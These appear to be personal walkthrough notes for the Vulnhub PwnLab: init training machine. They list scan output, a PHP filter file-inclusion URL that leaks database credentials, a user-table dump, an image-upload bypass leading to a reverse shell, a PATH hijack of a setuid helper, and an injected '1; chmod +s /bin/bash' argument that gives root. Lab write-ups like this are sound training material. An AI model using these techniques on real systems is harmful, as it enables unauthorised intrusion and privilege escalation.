Vulnhub: PwnLab: init

source: https://www.vulnhub.com/entry/pwnlab-init,158/

192.168.1.95

nmap:

80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
3306/tcp  open  mysql   MySQL 5.5.47-0+deb8u1
53409/tcp open  status  1 (RPC #100024)

debian 8 jessie

nikto:

+ /config.php: PHP Config file may contain database IDs and passwords.

+ OSVDB-3268: /images/: Directory indexing found.

+ OSVDB-3233: /icons/README: Apache default file found.

+ /login.php: Admin login page/section found.

local file inclusion:

http://192.168.1.95/?page=php://filter/convert.base64-encode/resource=config

<?php
$server   = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>

mysql -h192.168.1.95 -uroot -pH4u%QJ_H99 -sN -e "select * from Users.users"

kent    Sld6WHVCSkpOeQ==    -> JWzXuBJJNy

mike    U0lmZHNURW42SQ==  -> SIfdsTEn6I

kane    aVN2NVltMkdSbw==      -> iSv5Ym2GRo

login username kent, password JWzXuBJJNy

http://192.168.1.95/?page=php://filter/convert.base64-encode/resource=index

if (isset($_COOKIE['lang']))

{

        include("lang/".$_COOKIE['lang']);

}

local file inclusion: lang ../../../../etc/passwd john:x:1000:1000:,,,:/home/john:/bin/bash kent:x:1001:1001:,,,:/home/kent:/bin/bash mike:x:1002:1002:,,,:/home/mike:/bin/bash kane:x:1003:1003:,,,:/home/kane:/bin/bash

upload bypass: http://192.168.1.95/?page=php://filter/convert.base64-encode/resource=upload use burp, change php-> gif, mime image/gif, add header GIF89a; get reverse shell: lang ../upload/xxx.gif

Linux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29) i686 GNU/Linux PRETTY_NAME="Debian GNU/Linux 8 (jessie)" privilege escalation: username kane, password iSv5Ym2GRo

strings ~/msgmike export PATH=”/home/kane:$PATH” echo “/bin/bash -p” > ./cat chmod +x cat ./msgmike

strings /home/mike/msg2root /bin/echo %s >> /root/messages.txt ./msg2root 1; chmod +s /bin/bash /bin/bash -p

actually I need to create another reverse shell to cat the content of the flag.txt